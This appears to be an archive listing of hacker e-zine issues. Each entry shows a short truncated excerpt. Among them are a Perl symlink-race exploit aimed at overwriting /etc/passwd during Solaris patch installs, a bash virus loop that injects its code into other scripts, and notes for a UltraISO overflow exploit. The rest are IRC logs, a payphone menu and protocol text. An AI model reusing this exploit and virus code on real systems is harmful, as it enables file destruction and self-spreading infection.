
4.10 - Hack al los servidores de Pemex

eZine's profile picture
Published in 
 · 2 years ago
... tp://vapid.dhs.org:8080 #See BID http://www.securityfocus.com/bid/2127 #Discovery credit: Jonathan Fortin jfortin@revelex.com #tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10 use strict; my $NOISY = 1; # Do you want quiet output? my $clobber = "/etc/passwd"; print "Listening for patchadd process...\n" if ($NOISY); while(1) { open (ps,"ps -ef | grep -v grep |grep -v PID |"); while(<ps>) { my @args = (split " ", $_); if (/patch/) { print "Targeting PID $args[1] and symlinking response.$args[1] to $clobber\n" if ($NOISY); symlink($clobber,"/tmp/response.$args[1]"); exit ...

Fatal 3rror - No. 08

eZine's profile picture
Published in 
 · 2 years ago
... ] [nick] ([canal1] ... )\n\n"; exit(-1); } open(FDEBUG, "> pcbot.log"); open(RAW, "> raw.log"); open(NOTPARSED, "> noparsed.log"); rehash(); #testhash(); sub interrupt { debuga("Recebido um sinal de interrupcao..."); foreach $c (@canais) { privmsg($c, random_txt("partmsg")); } print $sock "QUIT :".random_txt("quitmsg")."\n"; close(FDEBUG); close($sock); exit(-1); } $SIG{'INT'}=$SIG{'TERM'}=\&interrupt; sub sighup { debuga("REHASH received..."); foreach $c (@canais) { privmsg($c, random_txt("rehashmsg")); } rehash(); } $SIG{'HUP'}=\&sighup; debuga("Conectando em $server:$port ..."); $sock = IO::Socket::INET- ...

The Hitchhiker's Guide To OS/2 - Issue 5

eZine's profile picture
Published in 
 · 3 years ago
... r and more flexible but if you don't want to remember complex command lines like below then FM's are for you :) uc a -m -tst -f -i sample.uc2 #test\new\files !*.doc These 4 FM's will all do just fine. If you're after small size and simplicity get DirMaster 1.2 but if you are after power and are willing to spend another 300kb or so, get DirManager. Of the 4 I think that Norton's is the worst and FM/2 some- where in the middle. DirManager is the winner in my book (and no I don't get a free copy for writing this, I wish :). However, if you choose one of these 4 then you'll most likely enjoy it and accept it's short ...

Input Output Magazine Issue 04

eZine's profile picture
Published in 
 · 4 years ago
... do if [ -f $fichier -a -w $fichier ] #$fichier est un fichier ? #on peut y écrire dedans ? then if file $fichier | grep Bourne-A > /dev/null #teste si le fichier est un #script bash then head -n 2 $fichier > .a if grep c0r0na .a > /dev/null #teste si le fichier a déjà #été infecter then rm -f .a else cat $fichier > .a #sinon head -n 23 $0 > $fichier #place le code viral dans le fichiers cat .a >> $fichier #remet le script initial à la suite rm -f .a fi fi fi done C'est vraiment rien de compliqué. Je restore le dossier test précédement sauvegardé et je teste mon nouveau script: [emper0r@laptop test]$ ls -al total 128 drwxrwxr-x 2 e ...

perl underground 5

eZine's profile picture
Published in 
 · 5 years ago
... on the local exploit #as soon as i get a chance this should be a straight forward #to exploit this as we already gain control of the #$eip register.. #tested on :win xp service pack 2 #Vendor's web site: http://www.ezbsystems.com/ultraiso # Version affected: UltraISO ############################################################ #Debug info as follows. ######################################### #Program received signal SIGSEGV, Segmentation fault. #[Switching to thread 1696.0x6d0] #0x41414141 in ?? () ############################################################ #(gdb) i r #eax 0x0 0 #ecx 0x7ce2fc 8184572 #edx 0x1 1 #ebx 0xfe646 ...

Keen Veracity Issue 12

eZine's profile picture
Published in 
 · 5 years ago
... ent release version for this to work. its not #pretty but it should work. Soon i will recode this in C or perl so it #can be a bit more feature rich. #tested on slack 8.1, by Gridmark TYPE=$2 echo "Usage $0 <current ssh version> <1|2>" echo "Use 1 for Slackware(MD5), 2 for Debian/Mandrake/Redhat(PAM)" echo "i.e. '$0 3.4.p1 1' for openssh 3.4.p1 and slackware (or machine that uses md5 passwords)" if [ "$1" = "" ]; then exit 0 fi if [ "$2" = "" ]; then exit 0 fi #Compiler options if you wish to change them. COMPOPTSLACK=" --with-tcp-wrappers --with-md5-passwords --prefix=/usr --sysconfdir=/etc/ssh" COMPOPTDEB=" --with-tcp ...

b0g 06

eZine's profile picture
Published in 
 · 5 years ago
... <JULIO> PLEASE LET ME GO [01:29] <JULIO> NO!! [01:29] <JULIO> WE WILL NOT LET YOU GO [01:29] <likwid> lol [01:29] BiTcH sets mode: -b #test!*@* [01:29] WhOrE sets mode: +b #test!*@* [01:29] <likwid> ? [01:30] <JULIO> QUEEN + WAYNE'S WORLD == GOOD TYMEZ [01:30] <mr_fidelity> don't you think its wierd that hotmail, a microsoft run service uses freebsd? [01:30] <mr_fidelity> you think they would come up with their own os that could handle that, it just goes to show windows is lame. [01:30] <JULIO> WHY YES. I AM EH HOT MALE. THANKZ FOR NOTICING [01:30] <mr_fidelity> I got the new linux mag, that comes with storm ...

Anarchy in the System No 04

eZine's profile picture
Published in 
 · 5 years ago
... ----+ | | | Allora... eccovi il menù COMPLETO del menù manutenzione: | +=*=*=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*=-=*=-=-=*=-=*= #test COMPONENTI »LETTORE CARTE TEST FUNZIONALE Introdurre la scheda... Scheda STP non letta... STATO ALLARMI NON DISPONIBILE RESET LETTORE NON DISPONIBILE »MODULO MONETE TEST FUNZIONALE Introdurre la scheda... STATO ALLARMI NON DISPONIBILE RESET LETTORE NON DISPONIBILE »DISPLAY (riempie il display e poi se non è danneggiato esce la scritta FINE) »MICROTELEFONO TEST FUNZIONALE NON DISPONIBILE STATO ALLARMI GENERALE: FAIL STRAPPO: FAIL »LINEA PRESENZA: OK GENERALE: NON DISP. COLLOQUIO: NON DISP. »BATT ...

Protocollo Internet Relay Chat

DrWatson's profile picture
Published in 
 · 6 years ago
... anale permettano questa azione. Risposte numeriche: ERR_NEEDMOREPARAMS ERR_NOTONCHANNEL RPL_NOTOPIC RPL_TOPIC ERR_CHANOPRIVSNEEDED Esempi: :Wiz TOPIC #test :New topic ; l’utente Wiz setta il topic. TOPIC #test :another topic ; setta il topic su #test. TOPIC #test ; mostra il topic di #test. 4.2.5 Comando Names Comando: NAMES Parametri: [< canale>{,< canale>}] Usando il comando NAMES, un utente puù avere una lista di nicknames che sono visibili. I nomi del canale che possono essere visti sono quelli che non sono privati (+p) o segreti (+s) o quelli che sono attualmente in uso. Il parametro < canale> specifica il canale di cui vogliamo avere delle i ...
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